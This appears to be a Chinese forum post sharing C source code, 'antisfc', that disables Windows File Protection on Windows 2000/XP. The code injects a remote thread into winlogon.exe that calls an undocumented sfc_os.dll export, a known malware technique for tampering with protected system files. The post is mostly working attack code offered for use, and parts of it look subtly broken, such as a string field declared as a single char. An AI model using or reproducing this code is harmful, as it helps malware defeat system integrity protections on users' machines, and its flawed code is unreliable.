关闭系统保护
关闭系统文件保护修改自bgate的代码
// ***************************************************************
//antisfc version:1.0 ·date: 04/20/2006
//-------------------------------------------------------------
//关闭系统文件保护
//-------------------------------------------------------------
//Copyright (C) 2006 - All Rights Reserved
// ***************************************************************
//
// ***************************************************************
#include <Tlhelp32.h>
#pragma comment( lib, "Advapi32.lib" )
typedef void (_stdcall * CLOSEEVENTS)(void);
typedef unsigned long DWORD;
typedef DWORD ANTISFC_ACCESS;
/*
* ANTISFC structures
*/
typedef struct _ANTISFC_PROCESS {
DWORD Pid; // process pid
HANDLE ProcessHandle; // process handle
char ImageName; // image name (not full path)
} ANTISFC_PROCESS, *PANTISFC_PROCESS;
DWORD Init() {
DWORDret = 0;
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))
{
tkp.PrivilegeCount = 1;
tkp.Privileges.Luid = sedebugnameValue;
tkp.Privileges.Attributes = SE_PRIVILEGE_ENABLED;
if (AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof tkp, NULL, NULL))
ret = 1;
}
CloseHandle(hToken);
}
return(ret);
}
DWORD GetPidEx(char *proc_name, char *full_path) {
DWORD dwPid=0;
HANDLE hSnapshot;
PROCESSENTRY32 pe;
BOOL ret;
if (isdigit(proc_name))
dwPid = strtoul(proc_name, NULL, 0);
else
dwPid = -1;
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == (HANDLE) -1) return 0;
pe.dwSize = sizeof(PROCESSENTRY32);
ret = Process32First(hSnapshot, &pe);
while (ret) {
if((strncmp(strlwr(pe.szExeFile), strlwr(proc_name), strlen(proc_name)) == 0)
|| (pe.th32ProcessID == dwPid)) {
dwPid = pe.th32ProcessID;
strcpy(full_path, pe.szExeFile);
break;
}
pe.dwSize = sizeof(PROCESSENTRY32);
ret = Process32Next(hSnapshot, &pe);
}
CloseHandle(hSnapshot);
if (dwPid == -1)
dwPid = 0;
return(dwPid);
}
DWORD InitProcess(PANTISFC_PROCESS Process, char *proc_name, ANTISFC_ACCESS access)
{
DWORD ret=0;
Process->Pid = GetPidEx(proc_name, Process->ImageName);
if (Process->Pid != 0 && Process->ImageName != 0) {
Process->ProcessHandle = OpenProcess(access, FALSE, Process->Pid);
if (Process->ProcessHandle != NULL)
ret = 1;
}
return ret;
}
DWORD InjectThread(PANTISFC_PROCESS Process,PVOID function)
{
HANDLE hThread;
DWORD dwThreadPid = 0, dwState;
hThread = CreateRemoteThread(Process->ProcessHandle,
NULL,
0,
(DWORD (__stdcall *) (void *)) function,
NULL,
0,
&dwThreadPid);
if (hThread == NULL) goto cleanup;
dwState = WaitForSingleObject(hThread, 4000); // attends 4 secondes
switch (dwState)
{
case WAIT_TIMEOUT:
case WAIT_FAILED:
goto cleanup;
case WAIT_OBJECT_0:
break;
default:
goto cleanup;
}
CloseHandle(hThread);
return dwThreadPid;
cleanup:
CloseHandle(hThread);
return 0;
}
BOOL anti_sfc()
{
ANTISFC_PROCESS Process;
HMODULE hSfc;
DWORD dwThread;
CLOSEEVENTS pfnCloseEvents;
DWORD dwVersion;
BOOL ret=FALSE;
BOOL flag=0;
__try
{
if (!Init()) __leave;
if(InitProcess(&Process, "winlogon.exe", PROCESS_ALL_ACCESS) == 0)
__leave;
flag=1;
dwVersion = GetVersion();
if ((DWORD)(LOBYTE(LOWORD(dwVersion))) == 5){ // Windows 2000/XP
if((DWORD)(HIBYTE(LOWORD(dwVersion))) == 0){ //Windows 2000
hSfc = LoadLibrary("sfc.dll");
}
else {//if((DWORD)(HIBYTE(LOWORD(dwVersion))) = 1) //Windows XP
hSfc = LoadLibrary("sfc_os.dll");
}
}
//else if ()//2003?
else __leave;
pfnCloseEvents = (CLOSEEVENTS)GetProcAddress(hSfc, MAKEINTRESOURCE(2));
if(pfnCloseEvents == NULL) __leave;
dwThread = InjectThread(&Process,
pfnCloseEvents);
ret=(dwThread==0?FALSE:TRUE);
}
__finally
{
if(hSfc!=NULL) FreeLibrary(hSfc);
if(flag==1) CloseHandle(Process.ProcessHandle);
}
return ret;
}
页:
[1]